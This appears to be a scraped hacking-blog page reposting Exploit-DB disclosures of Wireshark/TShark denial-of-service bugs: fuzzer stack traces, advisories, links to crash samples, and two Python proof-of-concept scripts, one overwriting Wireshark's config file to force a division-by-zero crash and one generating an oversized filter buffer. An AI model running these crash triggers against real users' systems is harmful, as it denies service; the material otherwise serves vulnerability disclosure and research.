Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.13-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1303
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
wsutil/inet_ipv6.h:111:15: runtime error: member access within null pointer of type 'const struct e_in6_addr'
#0 0x7f2b8106b2b8 in in6_is_addr_multicast wsutil/inet_ipv6.h:111:15
#1 0x7f2b81068247 in dissect_routing6_rpl epan/dissectors/packet-ipv6.c:952:9
#2 0x7f2b81052227 in dissect_routing6 epan/dissectors/packet-ipv6.c:1217:9
#3 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#4 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#5 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#6 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#7 0x7f2b800c8361 in dissect_ayiya epan/dissectors/packet-ayiya.c:134:9
#8 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#9 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#10 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#11 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#12 0x7f2b822f9326 in decode_udp_ports epan/dissectors/packet-udp.c:678:7
#13 0x7f2b8230ee02 in dissect epan/dissectors/packet-udp.c:1131:5
#14 0x7f2b822fe12f in dissect_udp epan/dissectors/packet-udp.c:1137:3
#15 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#16 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#17 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#18 0x7f2b80a62252 in dissect_exported_pdu epan/dissectors/packet-exported_pdu.c:307:17
#19 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#20 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#21 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#22 0x7f2b80b803e7 in dissect_frame epan/dissectors/packet-frame.c:521:11
#23 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#24 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#25 0x7f2b83a9fe87 in call_dissector_only epan/packet.c:2992:8
#26 0x7f2b83a88034 in call_dissector_with_data epan/packet.c:3005:8
#27 0x7f2b83a87054 in dissect_record epan/packet.c:567:3
#28 0x7f2b83a1f398 in epan_dissect_run_with_taps epan/epan.c:474:2
#29 0x561364f21686 in process_packet_single_pass tshark.c:3419:5
#30 0x561364f1a821 in process_cap_file tshark.c:3250:11
#31 0x561364f12549 in main tshark.c:1955:17
#32 0x7f2b754f9510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#33 0x561364dff4f9 in _start (run/tshark+0xd44f9)
SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42123.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863149343
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
epan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null
/usr/include/string.h:395:33: note: nonnull attribute specified here
#0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50
#1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23
#2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49
#3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13
#4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18
#5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9
#6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17
#7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12
#8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21
#9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12
#10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9
#11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13
#12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5
#13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9
#17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13
#18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9
#19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13
#20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7
#24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10
#25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9
#29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21
#30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5
#35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5
#36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11
#40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#44 0x7fb58947a694 in dissect_record epan/packet.c:567:3
#45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2
#46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5
#47 0x564f1828009e in load_cap_file tshark.c:3232:11
#48 0x564f18277e7b in main tshark.c:1954:13
#49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#50 0x564f18165709 in _start (run/tshark+0xd1709)
SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42124.zip
Build Information:
TShark (Wireshark) 2.0.2 (SVN Rev Unknown from unknown)
Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with libz 1.2.8, with GLib 2.48.0, with SMI 0.4.8, with c-ares 1.10.0, with Lua
5.2, with GnuTLS 3.4.10, with Gcrypt 1.6.5, with MIT Kerberos, with GeoIP.
Running on Linux 4.4.0-22-generic, with locale en_GB.UTF-8, with libpcap version
1.7.4, with libz 1.2.8, with GnuTLS 3.4.10, with Gcrypt 1.6.5.
Intel Core Processor (Haswell) (with SSE4.2)
Built using gcc 5.3.1 20160407.
--
Fuzzed PCAP eats large amounts of memory ( >4GB ) with a single UDP packet on tshark 2.0.2 and a recent build from repository
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40195.zip
GIOP capture
Build Information:
Version 2.0.3 (v2.0.3-0-geed34f0 from master-2.0)
Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with Qt 5.3.2, with WinPcap (4_1_3), with libz 1.2.8, with
GLib 2.42.0, with SMI 0.4.8, with c-ares 1.9.1, with Lua 5.2, with GnuTLS
3.2.15, with Gcrypt 1.6.2, with MIT Kerberos, with GeoIP, with QtMultimedia,
with AirPcap.
Running on 64-bit Windows 8.1, build 9600, with locale C, without WinPcap, with
GnuTLS 3.2.15, with Gcrypt 1.6.2, without AirPcap.
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz (with SSE4.2), with 16334MB of
physical memory.
Built using Microsoft Visual C++ 12.0 build 40629
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40196.zip
source: https://www.securityfocus.com/bid/49521/info
Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36128.pcap
source: https://www.securityfocus.com/bid/48389/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error.
An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
Wireshark 1.4.5 is vulnerable.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35873.pcap
source: https://www.securityfocus.com/bid/46796/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference error.
An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35432.pcap
# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
# Date: 02/09/2015
# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7
# Tested on: Windows 7
# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
import os
import subprocess
import getpass
drive=os.getenv("systemdrive")
user=getpass.getuser()
path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
def wiresharkIsPresent():
ps=subprocess.check_output("tasklist")
if "Wireshark.exe" in ps:
return 1
else:
return 0
def killWireshark():
try:
res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
return 1
except:
return 0
if wiresharkIsPresent():
if killWireshark():
print "Wireshark is killed!"
sploit="""
# Recent settings file for Wireshark 1.12.7.
#
# This file is regenerated each time Wireshark is quit
# and when changing configuration profile.
# So be careful, if you want to make manual changes here.
# Main Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.toolbar_main_show: TRUE
# Filter Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.filter_toolbar_show: TRUE
# Wireless Settings Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.wireless_toolbar_show: FALSE
# Show (hide) old AirPcap driver warning dialog box.
# TRUE or FALSE (case-insensitive).
gui.airpcap_driver_check_show: TRUE
# Packet list show (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_show: TRUE
# Tree view show (hide).
# TRUE or FALSE (case-insensitive).
gui.tree_view_show: TRUE
# Byte view show (hide).
# TRUE or FALSE (case-insensitive).
gui.byte_view_show: TRUE
# Statusbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.statusbar_show: TRUE
# Packet list colorize (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_colorize: TRUE
# Timestamp display format.
# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
gui.time_format: RELATIVE
# Timestamp display precision.
# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
gui.time_precision: AUTO
# Seconds display format.
# One of: SECONDS, HOUR_MIN_SEC
gui.seconds_format: SECONDS
# Zoom level.
# A decimal number.
gui.zoom_level: -10
# Bytes view.
# A decimal number.
gui.bytes_view: 0
# Main window upper (or leftmost) pane size.
# Decimal number.
gui.geometry_main_upper_pane: 440
# Main window middle pane size.
# Decimal number.
gui.geometry_main_lower_pane: 428
# Packet list column pixel widths.
# Each pair of strings consists of a column format and its pixel width.
column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
# Last directory navigated to in File Open dialog.
gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
"""
try:
f=open(path,"w")
f.write(sploit)
f.close()
print "Success!"
except:
print "Fail :("
#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis >
buffer = "A"*80000
file = open("wireshark.txt","w")
file.write(buffer)
file.close()
print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"
Sample generated with AFL
Build Information:
TShark (Wireshark) 2.0.4
Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with libz 1.2.8, with GLib 2.48.1, without SMI, with c-ares 1.11.0, with Lua
5.2, with GnuTLS 3.4.13, with Gcrypt 1.7.1, with MIT Kerberos, with GeoIP.
Running on Linux 4.6.3-1-ARCH, with locale en_US.utf8, with libpcap version
1.7.4, with libz 1.2.8, with GnuTLS 3.4.13, with Gcrypt 1.7.1.
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz (with SSE4.2)
Built using gcc 6.1.1 20160602.
--
This issue was uncovered with AFL (http://lcamtuf.coredump.cx/afl/)
This infinite loop is caused by an offset of 0 being returned by wkh_content_disposition(). This offset of 0 prevents the while loop using "offset < tvb_len" from returning and results in an infinite loop.
This issue has been observed in both tshark 1.12.x and 2.0.x.
Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://samate.nist.gov
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40198.zip
Sample PCAP
Build Information:
TShark (Wireshark) 2.0.2 (SVN Rev Unknown from unknown)
Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with libz 1.2.8, with GLib 2.48.0, with SMI 0.4.8, with c-ares 1.10.0, with Lua
5.2, with GnuTLS 3.4.10, with Gcrypt 1.6.5, with MIT Kerberos, with GeoIP.
Running on Linux 4.4.0-22-generic, with locale en_GB.UTF-8, with libpcap version
1.7.4, with libz 1.2.8, with GnuTLS 3.4.10, with Gcrypt 1.6.5.
Intel Core Processor (Haswell) (with SSE4.2)
Built using gcc 5.3.1 20160407.
--
Fuzzed PCAP takes 100% CPU and runs for a long time on tshark 2.0.2 and a recent build from repository ( commit 688d055acd523e645c1e87267dcf4a0a9867adbd ).
GDB backtrace from 'tshark -2 -V -r <pcap>' aborted after running for a while:
Program received signal SIGABRT, Aborted.
0x00007ffff45bb676 in rlc_decode_li (mode=RLC_AM, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, li=0x7fffffffbab0, max_li=16 '\020', li_on_2_bytes=0) at packet-rlc.c:1722
1722 next_bytes = li_on_2_bytes ? tvb_get_ntohs(tvb, hdr_len) : tvb_get_guint8(tvb, hdr_len);
123 tomb gdb execution "thread apply all bt" 321
Thread 1 (Thread 0x7ffff7fb9740 (LWP 1578)):
#0 0x00007ffff45bb676 in rlc_decode_li (mode=RLC_AM, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, li=0x7fffffffbab0, max_li=16 '\020', li_on_2_bytes=0) at packet-rlc.c:1722
#1 0x00007ffff45bde04 in dissect_rlc_am (channel=RLC_UL_DCCH, tvb=0x9342c0, pinfo=0xb04c18, top_level=0x0, tree=0x0, atm=0x0) at packet-rlc.c:2308
#2 0x00007ffff45be82a in dissect_rlc_dcch (tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-rlc.c:2477
#3 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
#4 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
#5 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
#6 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2804
#7 0x00007ffff47e7679 in dissect_mac_fdd_dch (tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_mac.c:564
#8 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
#9 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
#10 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
#11 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2804
#12 0x00007ffff47dab2e in dissect_tb_data (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, offset=3, p_fp_info=0x7fffeca74180, data_handle=0x7ffff7aae8e8 <mac_fdd_dch_handle>, data=0x0) at packet-umts_fp.c:815
#13 0x00007ffff47decbb in dissect_dch_channel_info (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, offset=3, p_fp_info=0x7fffeca74180, data=0x0) at packet-umts_fp.c:2557
#14 0x00007ffff47e476e in dissect_fp_common (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_fp.c:4419
#15 0x00007ffff47e4add in dissect_fp (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_fp.c:4507
#16 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
#17 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
#18 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
#19 0x00007ffff3c99819 in try_conversation_dissector (addr_a=0xb04cf0, addr_b=0xb04cd8, ptype=PT_UDP, port_a=65359, port_b=8040, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at conversation.c:1323
#20 0x00007ffff47d3839 in decode_udp_ports (tvb=0x848b70, offset=8, pinfo=0xb04c18, tree=0x0, uh_sport=8040, uh_dport=65359, uh_ulen=3554) at packet-udp.c:541
#21 0x00007ffff47d5e21 in dissect (tvb=0x848b70, pinfo=0xb04c18, tree=0x0, ip_proto=17) at packet-udp.c:1080
#22 0x00007ffff47d5e79 in dissect_udp (tvb=0x848b70, pinfo=0xb04c18, tree=0x0, data=0x7fffec869030) at packet-udp.c:1086
#23 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb13330, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, data=0x7fffec869030) at packet.c:660
#24 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb13330, tvb=0x848b70, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffec869030) at packet.c:735
#25 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x7b1cc0, uint_val=17, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffec869030) at packet.c:1199
#26 0x00007ffff425e409 in ip_try_dissect (heur_first=0, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, iph=0x7fffec869030) at packet-ip.c:1977
#27 0x00007ffff426037c in dissect_ip_v4 (tvb=0x848b20, pinfo=0xb04c18, parent_tree=0x0, data=0x0) at packet-ip.c:2476
#28 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb78930, tvb=0x848b20, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
#29 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb78930, tvb=0x848b20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
#30 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x73c040, uint_val=2048, tvb=0x848b20, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:1199
#31 0x00007ffff3cab5e4 in dissector_try_uint (sub_dissectors=0x73c040, uint_val=2048, tvb=0x848b20, pinfo=0xb04c18, tree=0x0) at packet.c:1225
#32 0x00007ffff40a1c60 in dissect_ethertype (tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet-ethertype.c:262
#33 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:660
#34 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda50000, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffffffcc20) at packet.c:735
#35 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:2791
#36 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:2804
#37 0x00007ffff40a04d5 in dissect_eth_common (tvb=0xb03d20, pinfo=0xb04c18, parent_tree=0x0, fcs_len=-1) at packet-eth.c:540
#38 0x00007ffff40a106b in dissect_eth (tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0xad6928) at packet-eth.c:836
#39 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb5c7a0, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0xad6928) at packet.c:660
#40 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb5c7a0, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0xad6928) at packet.c:735
#41 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x73c2c0, uint_val=1, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0xad6928) at packet.c:1199
#42 0x00007ffff40e9887 in dissect_frame (tvb=0xb03d20, pinfo=0xb04c18, parent_tree=0x0, data=0x7fffffffd380) at packet-frame.c:507
#43 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:660
#44 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda51950, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffffffd380) at packet.c:735
#45 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:2791
#46 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:2804
#47 0x00007ffff3caa079 in dissect_record (edt=0xb04c00, file_type_subtype=1, phdr=0xad68c0, tvb=0xb03d20, fd=0x7fffffffd550, cinfo=0x0) at packet.c:543
#48 0x00007ffff3c9ebf9 in epan_dissect_run (edt=0xb04c00, file_type_subtype=1, phdr=0xad68c0, tvb=0xb03d20, fd=0x7fffffffd550, cinfo=0x0) at epan.c:365
#49 0x000000000041844c in process_packet_first_pass (cf=0x64f100 <cfile>, edt=0xb04c00, offset=20928, whdr=0xad68c0, pd=0xb04e20 "4\a\373\024t,\320\320\375+\004\300\b") at tshark.c:2694
#50 0x0000000000418dd7 in load_cap_file (cf=0x64f100 <cfile>, save_file=0x0, out_file_type=2, out_file_name_res=0, max_packet_count=-1, max_byte_count=0) at tshark.c:2988
#51 0x0000000000416fa0 in main (argc=5, argv=0x7fffffffdda8) at tshark.c:1873
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40199.zip
Sample generated by AFL
Build Information:
TShark 1.12.9 (v1.12.9-0-gfadb421 from (HEAD)
